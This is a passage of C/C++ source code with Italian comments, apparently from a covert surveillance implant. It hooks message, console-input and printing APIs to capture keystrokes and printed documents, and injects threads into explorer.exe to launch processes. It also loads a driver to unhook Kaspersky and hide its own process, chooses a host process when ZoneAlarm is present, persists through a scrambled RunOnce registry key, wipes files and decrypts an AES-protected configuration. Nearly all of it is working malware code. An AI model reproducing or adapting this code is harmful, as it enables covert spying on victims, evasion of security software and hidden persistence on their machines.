	HMMAKE_HOOK(dwPid, "GetMessageA", PM_GetMessage, GetMessageData, PM_GetMessage_setup, pServiceData, "user32.dll");
	HMMAKE_HOOK(dwPid, "GetMessageW", PM_GetMessage, GetMessageData, PM_GetMessage_setup, pServiceData, "user32.dll");
	HMMAKE_HOOK(dwPid, "PeekMessageA", PM_PeekMessage, GetMessageData, PM_GetMessage_setup, pServiceData, "user32.dll");
	HMMAKE_HOOK(dwPid, "PeekMessageW", PM_PeekMessage, GetMessageData, PM_GetMessage_setup, pServiceData, "user32.dll");
	HMMAKE_HOOK(dwPid, "ReadConsoleInputA", PM_ReadConsoleInput, GetMessageData, PM_GetMessage_setup, pServiceData, "kernel32.dll");
	HMMAKE_HOOK(dwPid, "ReadConsoleInputW", PM_ReadConsoleInput, GetMessageData, PM_GetMessage_setup, pServiceData, "kernel32.dll");
	HMMAKE_HOOK(dwPid, "ReadConsoleA", PM_ReadConsoleA, GetMessageData, PM_GetMessage_setup, pServiceData, "kernel32.dll");
	HMMAKE_HOOK(dwPid, "ReadConsoleW", PM_ReadConsoleW, GetMessageData, PM_GetMessage_setup, pServiceData, "kernel32.dll");
	HMMAKE_HOOK(dwPid, "ReadConsoleInputExA", PM_ReadConsoleInputEx, GetMessageData, PM_GetMessage_setup, pServiceData, "kernel32.dll");
	HMMAKE_HOOK(dwPid, "ReadConsoleInputExW", PM_ReadConsoleInputEx, GetMessageData, PM_GetMessage_setup, pServiceData, "kernel32.dll");

	// --- PM per il print agent...
	// Le altre funzioni utilizzeranno PARAM[0] per accedere ai dati memorizzati nella
	// DataStruct di CreateDC (es: handle al memory device)
	pServiceData->PARAM[0] = HMMAKE_HOOK(dwPid, "CreateDCW", CreateDC_wrap, CreateDC_data, CreateDC_setup, pServiceData, "GDI32.dll");
	// Se ha creato correttamente il primo hook, inserisce tutti gli altri
	// Altrimenti scorrerebbero non avendo il puntatore alla struttura dati 
	// di CreateDC
	if (pServiceData->PARAM[0]) {
		HMMAKE_HOOK(dwPid, "CreateDCA", CreateDCA_wrap, CreateDCA_data, CreateDCA_setup, pServiceData, "GDI32.dll");
		HMMAKE_HOOK(dwPid, "DeleteDC", DeleteDC_wrap, DeleteDC_data, DeleteDC_setup, pServiceData, "GDI32.dll");
		HMMAKE_HOOK(dwPid, "StartDocW", StartDoc_wrap, StartDoc_data, StartDoc_setup, pServiceData, "GDI32.dll");
		HMMAKE_HOOK(dwPid, "StartDocA", StartDoc_wrap, StartDoc_data, StartDoc_setup, pServiceData, "GDI32.dll");
		HMMAKE_HOOK(dwPid, "StartPage", StartPage_wrap, StartPage_data, StartPage_setup, pServiceData, "GDI32.dll");
		HMMAKE_HOOK(dwPid, "EndPage", EndPage_wrap, EndPage_data, EndPage_setup, pServiceData, "GDI32.dll");
		HMMAKE_HOOK(dwPid, "EndDoc", EndDoc_wrap, EndDoc_data, EndDoc_setup, pServiceData, "GDI32.dll");
		HMMAKE_HOOK(dwPid, "SetAbortProc", SetAbortProc_wrap, SetAbortProc_data, SetAbortProc_setup, pServiceData, "GDI32.dll");
		HMMAKE_HOOK(dwPid, "GetDeviceCaps", GetDeviceCaps_wrap, GetDeviceCaps_data, GetDeviceCaps_setup, pServiceData, "GDI32.dll");
	}
}


void __stdcall HM_sInBundleService(DWORD dwPid, HMServiceStruct *pServiceData)
{
	HMMAKE_HOOK(dwPid, NULL, IPCClientRead, IPCClientRead_data, IPCClientRead_setup, NULL, NULL);
	HMMAKE_HOOK(dwPid, NULL, IPCClientWrite, IPCClientWrite_data, IPCClientWrite_setup, NULL, NULL);
	pServiceData->pHM_IpcCliRead = (HM_IPCClientRead_t) IPCClientRead_data.dwHookAdd;	
	pServiceData->pHM_IpcCliWrite = (HM_IPCClientWrite_t) IPCClientWrite_data.dwHookAdd;
}

////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
// 
//								EXPORTS SECTION: END 
//
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////


////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
// 
//								STARTUP PROCUDERE: START
//
////////////////////////////////////////////////////////////////////////////////

////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
//
//    Funzioni di supporto
//

// Converte Unicode in ascii
void HM_U2A(char *buffer)
{
	DWORD i=0, j=0;
	if (!buffer || buffer[1]!=0)
		return;

	do {
		i++;
		j+=2;
		buffer[i]=buffer[j];
	} while(buffer[i]!=0);
}

void HM_A2U(char *src, char *dst)
{
	DWORD i=0;
	do {
		dst[i*2] = src[i];
		dst[i*2+1] = 0;
	} while(src[i++]);
}


HANDLE HM_SafeCreateRemoteThread(HANDLE hProcessRem, 
								 LPSECURITY_ATTRIBUTES lpThreadAttributes,
								 SIZE_T dwStackSize,
								 LPTHREAD_START_ROUTINE lpStartAddress,
								 LPVOID lpParameter,
								 DWORD dwCreationFlags,
								 LPDWORD lpThreadId)
{
	HMODULE h_usr;
	BYTE *proc_addr = NULL;
	DWORD dwTmp;
	HANDLE hProcess;
	char byte_XP[7]="\x68\x10\x04\x00\x00\x68";
	char byte_2K[7]="\x55\x8B\xEC\x6A\xFF\x68";
	char byte_XP_SP1[7]="\x68\x00\x04\x00\x00\x68";
	char *patch;

	// Controlla il primo opcode della funzione
	h_usr = GetModuleHandle("kernel32.dll");
	if (h_usr)
		proc_addr = (BYTE *)HM_SafeGetProcAddress(h_usr, "CreateRemoteThread");
	// se c'e' un errore chiama quella originale
	if (!proc_addr)
		return CreateRemoteThread(hProcessRem, lpThreadAttributes, dwStackSize, lpStartAddress, lpParameter, dwCreationFlags, lpThreadId);

	// Se il primo opcode e' una JMP
	if (*proc_addr == 0xFF) {
		// Cerca di capire con cosa ripatchare 
		// a seconda della versione
		if (proc_addr[15] == 0xA1) 
			patch = byte_XP;
		else if (proc_addr[16] == 0xA1) 
			patch = byte_2K;
		else if (proc_addr[15] == 0x33 && proc_addr[16] == 0xF6)
			patch = byte_XP_SP1;
		else
			return CreateRemoteThread(hProcessRem, lpThreadAttributes, dwStackSize, lpStartAddress, lpParameter, dwCreationFlags, lpThreadId);
		
		// Effettua il patching nel prcesso
		hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, GetCurrentProcessId());
		if (hProcess) {
			WriteProcessMemory(hProcess, proc_addr, patch, 6, &dwTmp);
			CloseHandle(hProcess);
		}
	}

	return CreateRemoteThread(hProcessRem, lpThreadAttributes, dwStackSize, lpStartAddress, lpParameter, dwCreationFlags, lpThreadId);
}

// Prende un path in unicode e torna una stringa dos sicuramente valida in 
// ascii per accedere al file
char *GetDosAsciiName(WCHAR *orig_path)
{
	char *dest_a_path;
	WCHAR dest_w_path[_MAX_PATH + 2];
	DWORD mblen;

	memset(dest_w_path, 0, sizeof(dest_w_path));
	if (!GetShortPathNameW(orig_path, dest_w_path, (sizeof(dest_w_path) / sizeof (WCHAR))-1))
		return NULL;

	if ( (mblen = WideCharToMultiByte(CP_ACP, 0, dest_w_path, -1, NULL, 0, NULL, NULL)) == 0 )
		return NULL;

	if ( !(dest_a_path = (char *)malloc(mblen)) )
		return NULL;

	if ( WideCharToMultiByte(CP_ACP, 0, dest_w_path, -1, (LPSTR)dest_a_path, mblen, NULL, NULL) == 0 ) {
		free(dest_a_path);
		return NULL;
	}

	return dest_a_path;
}

// Espande le variabili d'ambiente e il tag della home
BOOL HM_ExpandStrings(char *source, char *dest, DWORD dsize)
{
	char *ptr;
	char *tmp_buf;

	if (!ExpandEnvironmentStrings(source, dest, dsize)) 
		return FALSE;

	if ( !(tmp_buf = (char *)malloc(dsize)) )
		return FALSE;

	// Espande la variabile d'ambiente fittizia della home
	while ( (ptr = strstr(dest, HOME_VAR_NAME)) ) {
		*ptr = 0;
		ptr += strlen(HOME_VAR_NAME);
		if (_snprintf_s(tmp_buf, dsize, _TRUNCATE, "%s%s%s", dest, H4_HOME_PATH, ptr) == -1 ||
			_snprintf_s(dest, dsize, _TRUNCATE, "%s", tmp_buf) == -1) {
			free(tmp_buf);
			return FALSE;
		}
	}
	free(tmp_buf);
	return TRUE;
}


// Ritorna il nome del processo "pid"
// Torna NULL se non ha trovato niente 
// N.B. Se torna una stringa, va liberata
char *HM_FindProc(DWORD pid)
{
	HANDLE hProcessSnap;
	PROCESSENTRY32 pe32;
	DWORD dwPID = 0;
	char *name_offs;
	char *ret_name = NULL;

	pe32.dwSize = sizeof( PROCESSENTRY32 );
	if ( (hProcessSnap = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 )) == INVALID_HANDLE_VALUE )
		return NULL;

	if( !Process32First( hProcessSnap, &pe32 ) ) {
		CloseHandle( hProcessSnap );
		return NULL;
	}

	// Cicla la lista dei processi attivi
	do {
		// Cerca il processo "pid"
		if (pe32.th32ProcessID == pid) {
			// Elimina il path
			name_offs = strrchr(pe32.szExeFile, '\\');
			if (!name_offs)
				name_offs = pe32.szExeFile;
			else
				name_offs++;
			ret_name = _strdup(name_offs);
			break;
		}
	} while( Process32Next( hProcessSnap, &pe32 ) );

	CloseHandle( hProcessSnap );
	return ret_name;
}

// Torna TRUE se il processo e' dell'utente
// chiamante
BOOL IsMyProcess(DWORD pid)
{
	HANDLE hProc=0;
	HANDLE hToken=0;
	TOKEN_USER *token_owner=NULL;
	char wsRefDomain[512], wsUserName[512], wsEffectiveName[512];
	SID_NAME_USE peUse;
	BOOL ret_val = FALSE;
	DWORD dwLen=0, cbUserName = sizeof(wsUserName), cbRefDomain = sizeof(wsRefDomain), cbEffectiveName = sizeof(wsEffectiveName);

	hProc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pid);

	if (hProc) {
		if( OpenProcessToken(hProc, TOKEN_QUERY| TOKEN_QUERY_SOURCE, &hToken) ) {
			GetTokenInformation(hToken, TokenUser, token_owner, 0, &dwLen);
			if (dwLen)
				token_owner = (TOKEN_USER *) malloc( dwLen );
			if(token_owner) {
				memset(token_owner, 0, dwLen);
				if( GetTokenInformation(hToken, TokenUser, token_owner, dwLen, &dwLen) )
					if (LookupAccountSid(NULL, token_owner->User.Sid, wsUserName, &cbUserName, wsRefDomain, &cbRefDomain, &peUse)) 
						if (GetUserName(wsEffectiveName, &cbEffectiveName))
							if (!_stricmp(wsEffectiveName, wsUserName))
								ret_val = TRUE;
				free(token_owner);
			}
			CloseHandle(hToken);
		}
		CloseHandle(hProc);
	}

	return ret_val;
}

// Ritorna il PID del processo "proc_name"
// Torna 0 se non lo trova
// Se my_flag e' settato, torna solo i processi
// dell'utente chiamante
DWORD HM_FindPid(char *proc_name, BOOL my_flag)
{
	HANDLE hProcessSnap;
	PROCESSENTRY32 pe32;
	DWORD dwPID = 0;
	char *name_offs;

	pe32.dwSize = sizeof( PROCESSENTRY32 );
	if ( (hProcessSnap = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 )) == INVALID_HANDLE_VALUE )
		return 0;

	if( !Process32First( hProcessSnap, &pe32 ) ) {
		CloseHandle( hProcessSnap );
		return 0;
	}

	// Cicla la lista dei processi attivi
	do {
		// Elimina il path
		name_offs = strrchr(pe32.szExeFile, '\\');
		if (!name_offs)
			name_offs = pe32.szExeFile;
		else
			name_offs++;

		// Cerca il processo confrontando il nome
		if (!_stricmp(name_offs, proc_name)) {
			if (!my_flag || IsMyProcess(pe32.th32ProcessID)) {
				dwPID = pe32.th32ProcessID;
				break;
			}
		}
	} while( Process32Next( hProcessSnap, &pe32 ) );

	CloseHandle( hProcessSnap );
	return dwPID;
}


#define MAX_CMD_LINE 800
typedef BOOL (WINAPI *CreateProcess_t) (LPCTSTR, LPTSTR, LPSECURITY_ATTRIBUTES, LPSECURITY_ATTRIBUTES, BOOL, DWORD, LPVOID, LPCTSTR, LPSTARTUPINFO, LPPROCESS_INFORMATION);
typedef BOOL (WINAPI *CloseHandle_t) (HANDLE);
typedef struct {
	COMMONDATA;
	CreateProcess_t pCreateProcess;
	CloseHandle_t pCloseHandle;
	char cmd_line[MAX_CMD_LINE];
	DWORD flags;
	STARTUPINFO si;
    PROCESS_INFORMATION pi;
} HMCreateProcessThreadDataStruct;

// Thread iniettato dentro explorer per effettuare CreateProcess
DWORD HM_CreateProcessThread(void *dummy)
{
	INIT_WRAPPER(HMCreateProcessThreadDataStruct);

	if (!pData->pCreateProcess(NULL, pData->cmd_line, 0, 0, FALSE, pData->flags, 0, 0, &(pData->si), &(pData->pi))) {
		pData->pi.dwProcessId = 0;
		return 0;
	}

	// Chiude gli handle aperti dentro explorer
	pData->pCloseHandle(pData->pi.hProcess);
	pData->pCloseHandle(pData->pi.hThread);
	return 1;
}

//Riempie i campi relativi al nome del file immagine,
//file di configurazione, directory di installazione.
//Se torna FALSE non chiude niente, tanto il processo
//poi uscira'.
BOOL HM_GuessNames()
{
	char path_name[DLLNAMELEN+1];
	char neutral_name[MAX_RAND_NAME];
	char *ptr_offset;
	
	if (!FindModulePath(path_name, sizeof(path_name)))
		return FALSE;

	// Comincia la scomposizione del path
	// Ci assicuriamo la NULL terminazione

	// Nome DLL
	if (! (ptr_offset = StrRChr(path_name, NULL, '\\')) )
		return FALSE;
	_snprintf_s(H4DLLNAME, MAX_RAND_NAME, _TRUNCATE, "%s", ptr_offset+1);
	*ptr_offset = 0;

	// Path della home
	_snprintf_s(H4_HOME_PATH, DLLNAMELEN, _TRUNCATE, "%s", path_name);

	// Nome directory home
	if (! (ptr_offset = StrRChr(path_name, NULL, '\\')) )
		return FALSE;
	_snprintf_s(H4_HOME_DIR, MAX_RAND_NAME, _TRUNCATE, "%s", ptr_offset+1);

	// Deriva il nome dell'altro file che puo' essere usato per l'update
	// (Uso Alphabetlen/2 per avere sempre gli stessi due nomi che ciclano)
	if ( !(ptr_offset = LOG_ScrambleName(H4DLLNAME, ALPHABET_LEN/2, TRUE)) )
		return FALSE;
	_snprintf_s(H4_UPDATE_FILE, MAX_RAND_NAME, _TRUNCATE, "%s", ptr_offset);
	SAFE_FREE(ptr_offset);

	// Fra i due nomi possibili sceglie quello piu' piccolo in ordine alfabetico
	// da cui derivare i nomi rimanenti (in modo che qualsiasi dei due file
	// fra attuale e update sia utilizzato, i nomi dei file di conf, codec, etc.
	// siano gli stessi).
	if (H4_UPDATE_FILE[0]<H4DLLNAME[0])
		_snprintf_s(neutral_name, MAX_RAND_NAME, _TRUNCATE, "%s", H4_UPDATE_FILE);
	else
		_snprintf_s(neutral_name, MAX_RAND_NAME, _TRUNCATE, "%s", H4DLLNAME);

	// Il file di configurazione lo derivo dal nome "neutrale" della DLL
	// (quello fra i due dell'update piu' piccolo in ordine alfabetico).
	if ( !(ptr_offset = LOG_ScrambleName(neutral_name, 1, TRUE)) )
		return FALSE;
	_snprintf_s(H4_CONF_FILE, MAX_RAND_NAME, _TRUNCATE, "%s", ptr_offset);
	SAFE_FREE(ptr_offset);
	
	// Il conf back-up lo derivo dal file di conf
	if ( !(ptr_offset = LOG_ScrambleName(H4_CONF_FILE, 1, TRUE)) )
		return FALSE;
	_snprintf_s(H4_CONF_BU, MAX_RAND_NAME, _TRUNCATE, "%s", ptr_offset);
	SAFE_FREE(ptr_offset);

	// Il nome del codec lo derivo dal file di backup
	if ( !(ptr_offset = LOG_ScrambleName(H4_CONF_BU, 1, TRUE)) )
		return FALSE;
	_snprintf_s(H4_CODEC_NAME, MAX_RAND_NAME, _TRUNCATE, "%s", ptr_offset);
	SAFE_FREE(ptr_offset);

	// Il nome del file dummy lo derivo dal file del codec
	if ( !(ptr_offset = LOG_ScrambleName(H4_CODEC_NAME, 1, TRUE)) )
		return FALSE;
	_snprintf_s(H4_DUMMY_NAME, MAX_RAND_NAME, _TRUNCATE, "%s", ptr_offset);
	SAFE_FREE(ptr_offset);

	// XXX Attenzione che dopo dummy_name c'e' il nome del driver di
	// kaspersky

	// La chiave nel registry la deriva dalla directory
	if ( !(ptr_offset = LOG_ScrambleName(H4_HOME_DIR, 1, TRUE)) )
		return FALSE;
	ptr_offset[0] = '*'; // Aggiunge l'* per il SAFE MODE
	_snprintf_s(REGISTRY_KEY_NAME, MAX_RAND_NAME, _TRUNCATE, "%s", ptr_offset);
	SAFE_FREE(ptr_offset);

	return TRUE;
}

// Funzione richiamata dal dropper che sceglie il processo da usare per fare la 
// CreateProcess e poi la invoca.
void __stdcall HM_RunCore(char *cmd_line, DWORD flags, STARTUPINFO *si, PROCESS_INFORMATION *pi)
{
	DWORD dummy;
	// Decide se e dove copiare il driver 
	// XXX (per comodo non pu copiarlo in system32)
	if (IsVista(&dummy) || IsKaspersky()) {
		BOOL is_forcing = FALSE;
		WCHAR drv_path[DLLNAMELEN*2];

		if (!HM_GuessNames())
			return;

		// Copia il driver
		if (!CopySystemDriver(drv_path))
			return;

		// con Kaspersky su XP carica il drvier in modo forzato
		if (IsKaspersky() && !IsVista(&dummy))
			is_forcing = TRUE;

		HideDevice dev_unhook(drv_path, is_forcing);
		Sleep(350); // XXX Attesa paranoica
		dev_unhook.unhook_all();
		dev_unhook.unhook_hidepid(GetCurrentProcessId(), TRUE);
		if (IsKaspersky() && !dev_unhook.unhook_isdrv(DRIVER_NAME_W))
			return;
	}

	// ---------------------------------------------
	
	// Vede se c'e' ZoneAlarm
	if (HM_FindPid("zlclient.exe", FALSE)) {
		// Se c'e' zonealarm usa come host ctfmon,
		// se questo non e' presente usa explorer
		HM_CreateProcess(cmd_line, flags, si, pi, HM_FindPid("ctfmon.exe", TRUE));
	} else // Non c'e' zonealarm e usa explorer
		HM_CreateProcess(cmd_line, flags, si, pi, 0);
	HideDevice dev_unhook;
	dev_unhook.unhook_hidepid(GetCurrentProcessId(), FALSE);	
}

// Funzione per far eseguire CreateProcess a explorer (o a un altro processo specificato)
// Se fallisce ritorna 0 come child_pid nella struttura PROCESS_INFORMATION
void __stdcall HM_CreateProcess(char *cmd_line, DWORD flags, STARTUPINFO *si, PROCESS_INFORMATION *pi, DWORD host_pid)
{
	HMCreateProcessThreadDataStruct HMCreateProcessThreadData;
	HMODULE hMod;
	HANDLE hThreadRem;
	HANDLE hProcess;
	DWORD dwThreadId;
	DWORD explorer_pid;
	DWORD dummy;
	BYTE *pCodeRemote;
	BYTE *pDataRemote;

	explorer_pid = host_pid;
	pi->dwProcessId = 0;
	ZeroMemory(&(HMCreateProcessThreadData.pi), sizeof(PROCESS_INFORMATION));
	memcpy(&(HMCreateProcessThreadData.si), si, sizeof(STARTUPINFO));
	HMCreateProcessThreadData.flags = flags;

	if (!HM_ExpandStrings(cmd_line, HMCreateProcessThreadData.cmd_line, sizeof(HMCreateProcessThreadData.cmd_line)))
		strcpy(HMCreateProcessThreadData.cmd_line, cmd_line);

	if (! (hMod = GetModuleHandle("KERNEL32.DLL")) )
		return;

	HMCreateProcessThreadData.pCreateProcess = (CreateProcess_t) HM_SafeGetProcAddress(hMod, "CreateProcessA");
	HMCreateProcessThreadData.pCloseHandle = (CloseHandle_t) HM_SafeGetProcAddress(hMod, "CloseHandle");
	if (!HMCreateProcessThreadData.pCreateProcess || !HMCreateProcessThreadData.pCloseHandle)
		return;

	// Cerca il PID di exporer.exe
	// solo se non abbiamo specificato il processo ospite
	if (!explorer_pid)
		if ( !(explorer_pid = HM_FindPid("explorer.exe", TRUE)) )
			return;

	// Inietta dentro explorer la funzione per la CreateProcess
	if(HM_sCreateHookA(explorer_pid, 
					   NULL, NULL, 
					   (BYTE *)HM_CreateProcessThread, 
					   500, 
					   (BYTE *)&HMCreateProcessThreadData, 
					   sizeof(HMCreateProcessThreadData)) == NULL)
							return;
	pCodeRemote = (BYTE *)HMCreateProcessThreadData.dwHookAdd;
	pDataRemote = (BYTE *)HMCreateProcessThreadData.dwDataAdd;

	// Esegue il thread in explorer.exe
	hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, explorer_pid);
	if(hProcess == NULL) 
		return;

	hThreadRem = HM_SafeCreateRemoteThread(hProcess, NULL, 8192, 
									(LPTHREAD_START_ROUTINE)pCodeRemote, 
									(LPVOID)pDataRemote, 0, 
									&dwThreadId);

	if(hThreadRem == NULL) {
		VirtualFreeEx(hProcess, pCodeRemote, 0, MEM_RELEASE);
		VirtualFreeEx(hProcess, pDataRemote, 0, MEM_RELEASE);
		CloseHandle(hProcess);
		return ;
	}
		
	// Aspetta che finisca il thread
	WaitForSingleObject(hThreadRem, INFINITE);
	CloseHandle(hThreadRem);

	// Legge la memoria con il PID
	if (ReadProcessMemory(hProcess, pDataRemote, &HMCreateProcessThreadData, sizeof(HMCreateProcessThreadData), &dummy))
		pi->dwProcessId = HMCreateProcessThreadData.pi.dwProcessId;

	VirtualFreeEx(hProcess, pDataRemote, 0, MEM_RELEASE);
	VirtualFreeEx(hProcess, pCodeRemote, 0, MEM_RELEASE);
	CloseHandle(hProcess);
	
	return;
}


// Funzione per il completamento del path relativo alla posizione della DLL
// principale. Deve essere usata solo dai thread del core (NON dai processi
// "iniettati")
// La funzione e' thread-safe, ma attenzione alla possibile race 
// condition sulla prima chiamata.
//
char *HM_CompletePath(char *file_name, char *buffer)
{
	_snprintf_s(buffer, _MAX_PATH, _TRUNCATE, "%s\\%s", H4_HOME_PATH, file_name);
	return buffer;
}

// ritorna la data (100-nanosec dal 1601)
BOOL HM_GetDate(nanosec_time *time)
{
	SYSTEMTIME system_time;
	FILETIME time_nanosec;

	// Prende il tempo di sistema e lo converte in FILETIME (100-nanosecondi)
	GetSystemTime(&system_time);
	if (!SystemTimeToFileTime(&system_time, &time_nanosec))
		return FALSE;

	time->hi_delay = time_nanosec.dwHighDateTime;
	time->lo_delay = time_nanosec.dwLowDateTime;

	return TRUE;
}

// Inserisce la chiave nel registry per l'avvio automatico
void HM_InsertRegistryKey(char *dll_name)
{
	char key_value[DLLNAMELEN*3];
	char dll_path[DLLNAMELEN];
	HKEY hOpen;

	// Path a rundll32.exe
	memset(key_value, 0, sizeof(key_value));
	GetSystemDirectory(key_value, sizeof(key_value));
	strcat(key_value, "\\rundll32.exe ");

	// Path alla DLL e nome funzione
	strcat(key_value, "\""); // Per sicurezza...
	strcat(key_value, HM_CompletePath(dll_name, dll_path));
	strcat(key_value, "\""); // ...metto il path alla dll fra ""
	strcat(key_value, ",HFF8"); 

	// Tenta di aprire CURRENT_USER: RunOnce ( 'O' uppercase)
	if (RegOpenKey(HKEY_CURRENT_USER, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce", &hOpen) == ERROR_SUCCESS) {
		if (RegSetValueEx(hOpen, REGISTRY_KEY_NAME, NULL, REG_EXPAND_SZ, (unsigned char *)key_value, strlen(key_value)) == ERROR_SUCCESS){
			RegCloseKey(hOpen);
			return;
		}
		RegCloseKey(hOpen);
	}

	// Tenta di aprire CURRENT_USER: Runonce ( 'o' lowercase)
	if (RegOpenKey(HKEY_CURRENT_USER, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Runonce", &hOpen) == ERROR_SUCCESS) {
		if (RegSetValueEx(hOpen, REGISTRY_KEY_NAME, NULL, REG_EXPAND_SZ, (unsigned char *)key_value, strlen(key_value)) == ERROR_SUCCESS) {
			RegCloseKey(hOpen);
			return;
		}
		RegCloseKey(hOpen);
	}

	// Altrimenti la crea in CURRENT_USER: RunOnce ('O' uppercase)
	if (RegCreateKey (HKEY_CURRENT_USER, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce", &hOpen) == ERROR_SUCCESS) {
		RegSetValueEx(hOpen, REGISTRY_KEY_NAME, NULL, REG_EXPAND_SZ, (unsigned char *)key_value, strlen(key_value));		
		RegCloseKey(hOpen);
	}

}


// Rimuove la chiave di startup nel registry
void HM_RemoveRegistryKey()
{
	HKEY hOpen;
		
	if (RegOpenKey (HKEY_CURRENT_USER, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce", &hOpen) == ERROR_SUCCESS) 
		RegDeleteValue (hOpen, REGISTRY_KEY_NAME);

	if (RegOpenKey (HKEY_CURRENT_USER, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Runonce", &hOpen) == ERROR_SUCCESS) 
		RegDeleteValue (hOpen, REGISTRY_KEY_NAME);
}

// Ritorna il puntatore a dopo una stringa trovata in memoria
char *HM_memstr(char *memory, char *string)
{
	char *ptr;
	ptr = memory;

	LOOP {
		if (!strcmp(ptr, string))
			return (ptr + strlen(string) + 1);
		ptr++;
	}
}

// Tenta a tutti i costi di cancellare un file
#define MAX_DELETE_TRY 15
#define DELETE_SLEEP_TIME 150
void HM_WipeFile(char *file_name)
{
	DWORD i;
	HANDLE hf;
	DWORD data_size;
	DWORD data_wiped;
	DWORD dwTmp;
	char wipe_string[]="\x0\x0\x0\x0\x0\x0\x0"; // la lunghezza di wipe string deve essere
	                                            // sotto multiplo di 4GB per evitare loop

	// Sovrascrive (solo se e' stato configurato per farlo)
	if (log_wipe_file) {
		for(i=0; i<MAX_DELETE_TRY; i++) {
			if ( (hf = CreateFile(file_name, GENERIC_WRITE, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL)) != INVALID_HANDLE_VALUE ) {
				data_size = GetFileSize(hf, NULL);
				if (data_size == INVALID_FILE_SIZE)
					data_size = 0;
				for (data_wiped=0; data_wiped<data_size; data_wiped+=sizeof(wipe_string))
					WriteFile(hf, wipe_string, sizeof(wipe_string), &dwTmp, NULL);
				CloseHandle(hf);
				break;
			}
			Sleep(DELETE_SLEEP_TIME);
		}
	}
	
	// Cancella
	for(i=0; i<MAX_DELETE_TRY; i++) {
		if (DeleteFile(file_name))
			break;
		Sleep(DELETE_SLEEP_TIME);
	}
}


// Verifica se c'e' una copia integra del file di configurazione.
// Se e' integra la rimpiazza sull'originale. In ogni caso la cancella (se esiste).
// Se rimpiazza l'originale ritorna TRUE.
BOOL HM_CheckNewConf() 
{
	HANDLE h_conf_file;
	BYTE *clear_file;
	char conf_path[DLLNAMELEN];
	char orig_conf_path[DLLNAMELEN];

	h_conf_file = CreateFile(HM_CompletePath(H4_CONF_BU, conf_path), GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
	// Se non trova nessun file di backup ritorna (lo considera inesistente)
	if (h_conf_file == INVALID_HANDLE_VALUE)
		return FALSE;
	CloseHandle(h_conf_file);

	// Verifica che il file sia integro e decifrabile correttamente
	clear_file = HM_ReadClearConf(H4_CONF_BU);
	if (!clear_file) {
		HM_WipeFile(HM_CompletePath(H4_CONF_BU, conf_path));
		return FALSE;
	}
	SAFE_FREE(clear_file);

	// Ora il file e' considerato integro e tutti gli handle sono chiusi.
	// Procede quindi alla copia su quello originale.
	// Se fallisce la copia non cancella il backup (lo copiera' al prossimo avvio).
	if (!CopyFile(HM_CompletePath(H4_CONF_BU, conf_path), HM_CompletePath(H4_CONF_FILE, orig_conf_path), FALSE))
		return FALSE;

	// La copia e' riuscita, quindi cancella il file di backup e torna TRUE.
	HM_WipeFile(HM_CompletePath(H4_CONF_BU, conf_path));
	return TRUE;
}


// Ritorna una zona di memoria con il file di configurazione
// in chiaro. Va liberata!!!. Torna NULL se fallisce.
BYTE *HM_ReadClearConf(char *conf_name)
{
	HANDLE h_conf_file, h_map = 0;
	BYTE *conf_memory = NULL;
	BYTE *conf_memory_clear = NULL;
	DWORD conf_len = INVALID_FILE_SIZE;
	DWORD *conf_clear_len;
	DWORD *file_crc;
	DWORD temp_len;
	DWORD end_len;
	char conf_path[DLLNAMELEN];
	BYTE iv[BLOCK_LEN];
	char *ptr;
	DWORD conf_hash;
	long long temp_hash;

	end_len = strlen(ENDOF_CONF_DELIMITER) + sizeof(DWORD); // tag di fine piu' CRC
	// Mappa per comodita' il file di configurazione nella memoria
	h_conf_file = CreateFile(HM_CompletePath(conf_name, conf_path), GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
	if (h_conf_file != INVALID_HANDLE_VALUE && (h_map = CreateFileMapping(h_conf_file, NULL, PAGE_READONLY, 0, 0, NULL))) {
		conf_memory = (BYTE *)MapViewOfFile(h_map, FILE_MAP_READ, 0, 0, 0);
		conf_len = GetFileSize(h_conf_file, NULL);
	}
	
	// Crea una copia in chiaro in memoria
	if (conf_memory && conf_len!=INVALID_FILE_SIZE && conf_len >= (CLEAR_CONF_LEN + sizeof(DWORD) + end_len)) {
		// Alloca la memoria 
		conf_memory_clear = (BYTE *)malloc(conf_len);
		if (conf_memory_clear) {
			// Decifra il file di conf (assume che la parte cifrata sia gia' stata
			// paddata).
			memset(iv, 0, sizeof(iv));
			aes_cbc_decrypt(&crypt_ctx, iv, conf_memory + CLEAR_CONF_LEN, conf_memory_clear, conf_len - CLEAR_CONF_LEN);
		}	
	}
	
	// Chiude il mapping
	if (conf_memory)
		UnmapViewOfFile(conf_memory);
	if (h_map)
		CloseHandle(h_map);
	if (h_conf_file != INVALID_HANDLE_VALUE)
		CloseHandle(h_conf_file);

	// Verifica che tutto sia stato decifrato correttamente
	// (altrimenti non torna niente)
	if (conf_memory_clear) {
		// Verifica la lunghezza
		conf_clear_len = (DWORD *)conf_memory_clear;
		temp_len = *conf_clear_len;
		if (temp_len % BLOCK_LEN) {
			temp_len /= BLOCK_LEN;
			temp_len++;
			temp_len *= BLOCK_LEN;
		}
		if (temp_len + CLEAR_CONF_LEN != conf_len) {
			SAFE_FREE(conf_memory_clear);
			return NULL;
		}
		if ( (*conf_clear_len) < end_len) {
			SAFE_FREE(conf_memory_clear);
			return NULL;
		}

		// Check della stringa di fine file (riutilizzo la variabile)
		conf_memory = conf_memory_clear + (*conf_clear_len) - end_len;
		if (memcmp(ENDOF_CONF_DELIMITER, conf_memory, strlen(ENDOF_CONF_DELIMITER)) != 0) {
			SAFE_FREE(conf_memory_clear);
			return NULL;
		}

